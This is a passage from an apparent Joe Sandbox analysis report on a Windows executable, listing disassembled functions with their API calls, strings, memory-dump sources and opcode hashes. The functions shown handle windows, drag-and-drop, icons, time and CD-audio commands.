                                                                                                                                                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 0093E856
                                                                                                                                                                                      • GetWindowRect.USER32(00000004,?), ref: 0093E8BF
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                                                                      • String ID: @$ThumbnailClass
                                                                                                                                                                                      • API String ID: 1788623398-1539354611
                                                                                                                                                                                      • Opcode ID: 5e1f330119298226180ca99b3b9c7d0f68e30520149fa2930aaea0b651432734
                                                                                                                                                                                      • Instruction ID: e1dfdf16914af0be1345413023764d8eb9f757f0f9fcbc25b9e40ce588a45b26
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e1f330119298226180ca99b3b9c7d0f68e30520149fa2930aaea0b651432734
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B818C314082099BDB05CF10D885FAA7BECEF94714F04846AFD8A9A0D5DB30ED46CFA1
                                                                                                                                                                                      Function 0093E4EA Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __wcsnicmp
                                                                                                                                                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                                                                      • API String ID: 1038674560-1810252412
                                                                                                                                                                                      • Opcode ID: f2e4cb797cf3053c274533238acabc4bf13117148562f6ff6851c35fa4d94352
                                                                                                                                                                                      • Instruction ID: 1dcb62819830479a9508560b0faff04ed0aad658f5f9e2b7580b2fddb883713e
                                                                                                                                                                                      • Opcode Fuzzy Hash: f2e4cb797cf3053c274533238acabc4bf13117148562f6ff6851c35fa4d94352
                                                                                                                                                                                      • Instruction Fuzzy Hash: EE31A131A48219EADB14FB50DE13FEE77A89FA0768F200564F491B10E9FF616F04CA56
                                                                                                                                                                                      Function 0093F898 Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • LoadIconW.USER32(00000063), ref: 0093F8AB
                                                                                                                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0093F8BD
                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 0093F8D4
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 0093F8E9
                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 0093F8EF
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0093F8FF
                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 0093F905
                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0093F926
                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0093F940
                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0093F949
                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 0093F9B4
                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0093F9BA
                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0093F9C1
                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0093FA0D
                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0093FA1A
                                                                                                                                                                                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0093FA3F
                                                                                                                                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0093FA6A
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3869813825-0
                                                                                                                                                                                      • Opcode ID: 9887b4705552b10f2837ca37e708a3f9e93824a73658cc2aafc3f41f0e191462
                                                                                                                                                                                      • Instruction ID: 5eb42872a8c8abd8cb9bc58c087bb22a63eb6db581b52dcf60fd46a1563a79ac
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9887b4705552b10f2837ca37e708a3f9e93824a73658cc2aafc3f41f0e191462
                                                                                                                                                                                      • Instruction Fuzzy Hash: A3516B71900709AFDB20DFA8CD99F6EBBF9FF04704F004928E696A26A0D774A944DF50
                                                                                                                                                                                      Function 0096CC68 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _memset.LIBCMT ref: 0096CD0B
                                                                                                                                                                                      • DestroyWindow.USER32(00000000,?), ref: 0096CD83
                                                                                                                                                                                        • Part of subcall function 00907E53: _memmove.LIBCMT ref: 00907EB9
                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0096CE04
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0096CE26
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0096CE35
                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 0096CE52
                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00900000,00000000), ref: 0096CE85
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0096CEA4
                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0096CEB9
                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0096CEC0
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0096CED2
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0096CEEA
                                                                                                                                                                                        • Part of subcall function 0091B155: GetWindowLongW.USER32(?,000000EB), ref: 0091B166
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                                                                      • String ID: 0$tooltips_class32
                                                                                                                                                                                      • API String ID: 1297703922-3619404913
                                                                                                                                                                                      • Opcode ID: cf04813f00e787a19d6f75cfa7cf4a9950aaa579538d4d0bc7e7418fc625ec31
                                                                                                                                                                                      • Instruction ID: 9bf6747add5b82cf38049369568238602c9edcf64601705c46951ea22a1b2e27
                                                                                                                                                                                      • Opcode Fuzzy Hash: cf04813f00e787a19d6f75cfa7cf4a9950aaa579538d4d0bc7e7418fc625ec31
                                                                                                                                                                                      • Instruction Fuzzy Hash: C171B8B1558309AFE722CF68CC84FBA3BE9AB89704F440919F985972A1DB31EC01DB15
                                                                                                                                                                                      Function 0096F122 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0091AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0091AF8E
                                                                                                                                                                                      • DragQueryPoint.SHELL32(?,?), ref: 0096F14B
                                                                                                                                                                                        • Part of subcall function 0096D5EE: ClientToScreen.USER32(?,?), ref: 0096D617
                                                                                                                                                                                        • Part of subcall function 0096D5EE: GetWindowRect.USER32(?,?), ref: 0096D68D
                                                                                                                                                                                        • Part of subcall function 0096D5EE: PtInRect.USER32(?,?,0096EB2C), ref: 0096D69D
                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0096F1B4
                                                                                                                                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0096F1BF
                                                                                                                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0096F1E2
                                                                                                                                                                                      • _wcscat.LIBCMT ref: 0096F212
                                                                                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0096F229
                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0096F242
                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0096F259
                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0096F27B
                                                                                                                                                                                      • DragFinish.SHELL32(?), ref: 0096F282
                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0096F36D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                      • API String ID: 169749273-3440237614
                                                                                                                                                                                      • Opcode ID: 3430ad2ba282164c58b57faf7f149e4e9ce868e31a214de818fc8f7683e3694d
                                                                                                                                                                                      • Instruction ID: 536d039655c4445a43ac5e5ef4c3ed3f6f39b181583337ea207b82f039146cff
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3430ad2ba282164c58b57faf7f149e4e9ce868e31a214de818fc8f7683e3694d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D614772508304AFC700EF60DC95E9BBBE8BFC9754F000A1DF595922A1DB309A49DB62
                                                                                                                                                                                      Function 0094B428 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 350timeCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • VariantInit.OLEAUT32(00000000), ref: 0094B46D
                                                                                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 0094B476
                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0094B482
                                                                                                                                                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0094B561
                                                                                                                                                                                      • __swprintf.LIBCMT ref: 0094B591
                                                                                                                                                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 0094B5BD
                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0094B63F
                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000016), ref: 0094B6D1
                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0094B727
                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0094B736
                                                                                                                                                                                      • VariantInit.OLEAUT32(00000000), ref: 0094B772
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                                                                      • API String ID: 3730832054-3931177956
                                                                                                                                                                                      • Opcode ID: 193dfe210a52d6fb4555aab584b58b37e341e28d085f9102b684b4dc5d84e755
                                                                                                                                                                                      • Instruction ID: e2efa614b540f13e815be9beb61898350c557cae394b8aaaa1aa7a7514aba7c7
                                                                                                                                                                                      • Opcode Fuzzy Hash: 193dfe210a52d6fb4555aab584b58b37e341e28d085f9102b684b4dc5d84e755
                                                                                                                                                                                      • Instruction Fuzzy Hash: BDC11531A04215EBCB10DF76D884F6AB7B9FF85310F148865F4099B6A2DB78EC50DBA1
                                                                                                                                                                                      Function 00966F67 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00966FF9
                                                                                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00967044
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: BuffCharMessageSendUpper
                                                                                                                                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                      • API String ID: 3974292440-4258414348
                                                                                                                                                                                      • Opcode ID: a921f271fd26e18af6734ffa9c566157e163b40d7bfeaaf162c31c7ee6a3d7d5
                                                                                                                                                                                      • Instruction ID: cdb02db7049f602d3fee0d7002cab88531daf929861b24f057d94c61b93e8530
                                                                                                                                                                                      • Opcode Fuzzy Hash: a921f271fd26e18af6734ffa9c566157e163b40d7bfeaaf162c31c7ee6a3d7d5
                                                                                                                                                                                      • Instruction Fuzzy Hash: E891A2342083019FCB14EF54C8A1BAAF7A2AFD4364F054859F8965B3A6CB31ED4ACB51
                                                                                                                                                                                      Function 0096E305 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0096E3BB
                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00969615,?), ref: 0096E417
                                                                                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0096E457
                                                                                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0096E49C
                                                                                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0096E4D3
                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,00000004,?,?,?,00969615,?), ref: 0096E4DF
                                                                                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0096E4EF
                                                                                                                                                                                      • DestroyIcon.USER32(?), ref: 0096E4FE
                                                                                                                                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0096E51B
                                                                                                                                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0096E527
                                                                                                                                                                                        • Part of subcall function 00921BC7: __wcsicmp_l.LIBCMT ref: 00921C50
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                                                                                      • String ID: .dll$.exe$.icl
                                                                                                                                                                                      • API String ID: 1212759294-1154884017
                                                                                                                                                                                      • Opcode ID: 4d936e5c52b6599dd818fab1cadf0785aa5e8881d7285731c43ebf7d981a2011
                                                                                                                                                                                      • Instruction ID: 531d69506236d0ad0a127896c5ff825d8e7522757362bfacabd972597a215a20
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d936e5c52b6599dd818fab1cadf0785aa5e8881d7285731c43ebf7d981a2011
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8261BE71510215BEEB14DF74DC86FAA77ACAB08720F108215F911E61E1EB749990DBA0
                                                                                                                                                                                      Function 00950E41 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184timeCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 00950EFF
                                                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00950F0F
                                                                                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00950F1B
                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 00950F79
                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00950F91
                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00950FA3
                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00950FB8
                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00950FCC
                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00950FFE
                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0095101F
                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 0095102B
                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0095106A
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                      • API String ID: 3566783562-438819550
                                                                                                                                                                                      • Opcode ID: bf7d75c087fe704b37171711267859de000bc719fc67c3e3374405ef77ff939b
                                                                                                                                                                                      • Instruction ID: bb985ad8f18a659819712897ee9162dccc02bdc11cf0442c1a36d38efcf0ddab
                                                                                                                                                                                      • Opcode Fuzzy Hash: bf7d75c087fe704b37171711267859de000bc719fc67c3e3374405ef77ff939b
                                                                                                                                                                                      • Instruction Fuzzy Hash: B26150B55083459FC710EF60C845A9BB3E9FFC9310F04891AF98597291EB31E949CB92
                                                                                                                                                                                      Function 0094DAAD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 009084A6: __swprintf.LIBCMT ref: 009084E5
                                                                                                                                                                                        • Part of subcall function 009084A6: __itow.LIBCMT ref: 00908519
                                                                                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 0094DB26
                                                                                                                                                                                      • GetDriveTypeW.KERNEL32 ref: 0094DB73
                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0094DBBB
                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0094DBF2
                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0094DC20
                                                                                                                                                                                        • Part of subcall function 00907E53: _memmove.LIBCMT ref: 00907EB9
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                      • API String ID: 2698844021-4113822522
                                                                                                                                                                                      • Opcode ID: e2847f36f11251347d3a015ca215ec4bd22850d039c6f33675842f23cf536b56
                                                                                                                                                                                      • Instruction ID: e11376b34e97adfeeb6f3b4089b529d3fbd34050e771607776f0670bcb45b834
                                                                                                                                                                                      • Opcode Fuzzy Hash: e2847f36f11251347d3a015ca215ec4bd22850d039c6f33675842f23cf536b56
                                                                                                                                                                                      • Instruction Fuzzy Hash: A9515B75504305AFC700EF10C991EAAB7E9EFC8768F10886CF896972A1DB31EE05CB52
                                                                                                                                                                                      Function 00943110 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 129windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00974085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00943145
                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,00974085,00000016), ref: 0094314E
                                                                                                                                                                                        • Part of subcall function 0090CAEE: _memmove.LIBCMT ref: 0090CB2F
                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00974085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00943170
                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,00974085,00000016), ref: 00943173
                                                                                                                                                                                      • __swprintf.LIBCMT ref: 009431B3
                                                                                                                                                                                      • __swprintf.LIBCMT ref: 009431C5
                                                                                                                                                                                      • _wprintf.LIBCMT ref: 0094326C
                                                                                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00943283
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
